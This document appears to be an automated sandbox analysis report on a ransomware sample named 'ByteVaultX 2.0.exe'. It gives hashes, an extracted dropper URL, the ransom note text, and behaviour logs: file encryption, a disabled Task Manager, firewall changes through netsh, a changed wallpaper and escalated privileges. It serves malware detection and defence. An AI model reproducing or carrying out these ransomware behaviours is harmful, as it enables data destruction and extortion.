958e65dedf5f42e310cbf4e7ba87ce130c2b60d95afb1da8f7390f2002f6caa2

Resubmissions

22-05-2024 15:54

240522-tca45sgd54 10

22-05-2024 15:32

19-05-2024 21:56

19-05-2024 21:54

19-05-2024 21:53

19-05-2024 20:56

18-05-2024 09:15

18-05-2024 00:54

Analysis

max time kernel
1049s
max time network
872s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
19-05-2024 21:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ByteVaultX 2.0.exe
Size

9.9MB
MD5

98e3408a9432d5046691c4cc744eb244
SHA1

c1e9d2c89d2cb72ee2f0f11ef97b2cb07d070142
SHA256

958e65dedf5f42e310cbf4e7ba87ce130c2b60d95afb1da8f7390f2002f6caa2
SHA512

dd4451441a051a6e9cc1be16702aaea1ce0fee4bd78c30cde050636e573b0ec1fcae4cde654a1928c941410840b8d0f989932779fc59e7bf70ce444029e689d5
SSDEEP

196608:ShFaRIk7AHkPkRJW9GNZA1HeT39Iig6eE9TFa0Z8DOjCdylNo1nz8QW7tx:tGFG8S1+TtIi+Y9Z8D8CclydoPx

Score

10^/10

evasion execution ransomware

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg

Extracted

Path

C:\Encrypt\encrypt.html

Ransom Note

Your Files Have Been Encrypted Your Files Have Been Encrypted By The ByteVaultX Test-Ransomware The price for the Decryption is $0 in Bitcoin (BTC). Follow these steps to get your decryption: You Do It. But Remember this malware is Just For VMS This is a Test Ransomware Your Files Have Been Encrypted By The ByteVaultX Test-Ransomware Ask AI How to Use the Ransomware key with the decryption algorithm (in this case, the Fernet decryption algorithm) to decrypt each encrypted file. Save the decrypted data to new files or overwrite the original encrypted files if desired. You Will Also Have To install Python and cryptography Please note that the dercyption key is in the path C:\encrypt\Key.txt and please note you have infinite time For support, you can ask ai how to encrypt your data Trustet AI

Signatures

Renames multiple (123) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

flow pid process

3 628 powershell.exe
5 1952 powershell.exe
6 3536 powershell.exe
7 4984 powershell.exe
Disables Task Manager via registry modification
evasion

flow	pid	process
3	628	powershell.exe
5	1952	powershell.exe
6	3536	powershell.exe
7	4984	powershell.exe

Modifies Windows Firewall 2 TTPs 15 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid	process
1812	netsh.exe
3420	netsh.exe
4592	netsh.exe
68	netsh.exe
4264	netsh.exe
1868	netsh.exe
4084	netsh.exe
4716	netsh.exe
624	netsh.exe
2588	netsh.exe
2928	netsh.exe
2600	netsh.exe
4188	netsh.exe
3860	netsh.exe
2260	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

ByteVaultX 2.0.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Control Panel\International\Geo\Nation	ByteVaultX 2.0.exe

Loads dropped DLL 12 IoCs

Processes:

ByteVaultX 2.0.exe

pid	process
552	ByteVaultX 2.0.exe
552	ByteVaultX 2.0.exe
552	ByteVaultX 2.0.exe
552	ByteVaultX 2.0.exe
552	ByteVaultX 2.0.exe
552	ByteVaultX 2.0.exe
552	ByteVaultX 2.0.exe
552	ByteVaultX 2.0.exe
552	ByteVaultX 2.0.exe
552	ByteVaultX 2.0.exe
552	ByteVaultX 2.0.exe
552	ByteVaultX 2.0.exe

Drops desktop.ini file(s) 8 IoCs

Processes:

ByteVaultX 2.0.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	ByteVaultX 2.0.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	ByteVaultX 2.0.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	ByteVaultX 2.0.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	ByteVaultX 2.0.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	ByteVaultX 2.0.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	ByteVaultX 2.0.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	ByteVaultX 2.0.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	ByteVaultX 2.0.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 32 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1032	powershell.exe
4540	powershell.exe
1812	powershell.exe
3204	powershell.exe
1944	powershell.exe
4948	powershell.exe
4148	powershell.exe
3856	powershell.exe
3088	powershell.exe
4688	powershell.exe
372	powershell.exe
3204	powershell.exe
2088	powershell.exe
4984	powershell.exe
1004	powershell.exe
2340	powershell.exe
4680	powershell.exe
224	powershell.exe
5012	powershell.exe
4732	powershell.exe
68	powershell.exe
2540	powershell.exe
3536	powershell.exe
2196	powershell.exe
1952	powershell.exe
1964	powershell.exe
3856	powershell.exe
3548	powershell.exe
1868	powershell.exe
4648	powershell.exe
4432	powershell.exe
628	powershell.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg"	reg.exe

Drops file in Windows directory 4 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdgeCP.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

Processes:

browser_broker.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exepowershell.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$vBulletin 3	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = e25bcf7637aada01	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\NextPromptBuild = "15063"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Explorer	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData\RulesFileNextUpdateDate = "422317900"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{5E650C74-DB9B-4D44-A7AC-E45F194C8C13} = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\NextUpdateDate = "422999285"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$Discuz!	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\NextUpdateDate = "422947428"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 041f006437aada01	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\FileVersion = "2016061511"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 905bdc6337aada01	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = f0d6cc7637aada01	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\NextUpdateDate = "422983373"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CTLs	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000e0140cec22e02db0424a8fbfb5a746b0a0bbfdaad6fbf0973fc7bd2e0dc19332a8bfcceac9ffa0e16c8b961ef063c509a01ef80e854cfde2f5be	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 96581a6437aada01	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$WordPress	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pid	process
5012	powershell.exe
5012	powershell.exe
5012	powershell.exe
3856	powershell.exe
3856	powershell.exe
3856	powershell.exe
3856	powershell.exe
1812	powershell.exe
1812	powershell.exe
1812	powershell.exe
1812	powershell.exe
3204	powershell.exe
3204	powershell.exe
3204	powershell.exe
3204	powershell.exe
2196	powershell.exe
2196	powershell.exe
2196	powershell.exe
2196	powershell.exe
4648	powershell.exe
4648	powershell.exe
4648	powershell.exe
4648	powershell.exe
4680	powershell.exe
4680	powershell.exe
4680	powershell.exe
4680	powershell.exe
2340	powershell.exe
2340	powershell.exe
2340	powershell.exe
2340	powershell.exe
3548	powershell.exe
3548	powershell.exe
3548	powershell.exe
3548	powershell.exe
3088	powershell.exe
3088	powershell.exe
3088	powershell.exe
3088	powershell.exe
4688	powershell.exe
4688	powershell.exe
4688	powershell.exe
4688	powershell.exe
3856	powershell.exe
3856	powershell.exe
3856	powershell.exe
3856	powershell.exe
628	powershell.exe
628	powershell.exe
628	powershell.exe
628	powershell.exe
1032	powershell.exe
1032	powershell.exe
1032	powershell.exe
1032	powershell.exe
1952	powershell.exe
1952	powershell.exe
1952	powershell.exe
1952	powershell.exe
4732	powershell.exe
4732	powershell.exe
4732	powershell.exe
4732	powershell.exe
224	powershell.exe

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

MicrosoftEdgeCP.exe

pid process

4440 MicrosoftEdgeCP.exe
4440 MicrosoftEdgeCP.exe
4440 MicrosoftEdgeCP.exe

pid	process
4440	MicrosoftEdgeCP.exe
4440	MicrosoftEdgeCP.exe
4440	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	5012	powershell.exe
Token: SeIncreaseQuotaPrivilege	5012	powershell.exe
Token: SeSecurityPrivilege	5012	powershell.exe
Token: SeTakeOwnershipPrivilege	5012	powershell.exe
Token: SeLoadDriverPrivilege	5012	powershell.exe
Token: SeSystemProfilePrivilege	5012	powershell.exe
Token: SeSystemtimePrivilege	5012	powershell.exe
Token: SeProfSingleProcessPrivilege	5012	powershell.exe
Token: SeIncBasePriorityPrivilege	5012	powershell.exe
Token: SeCreatePagefilePrivilege	5012	powershell.exe
Token: SeBackupPrivilege	5012	powershell.exe
Token: SeRestorePrivilege	5012	powershell.exe
Token: SeShutdownPrivilege	5012	powershell.exe
Token: SeDebugPrivilege	5012	powershell.exe
Token: SeSystemEnvironmentPrivilege	5012	powershell.exe
Token: SeRemoteShutdownPrivilege	5012	powershell.exe
Token: SeUndockPrivilege	5012	powershell.exe
Token: SeManageVolumePrivilege	5012	powershell.exe
Token: 33	5012	powershell.exe
Token: 34	5012	powershell.exe
Token: 35	5012	powershell.exe
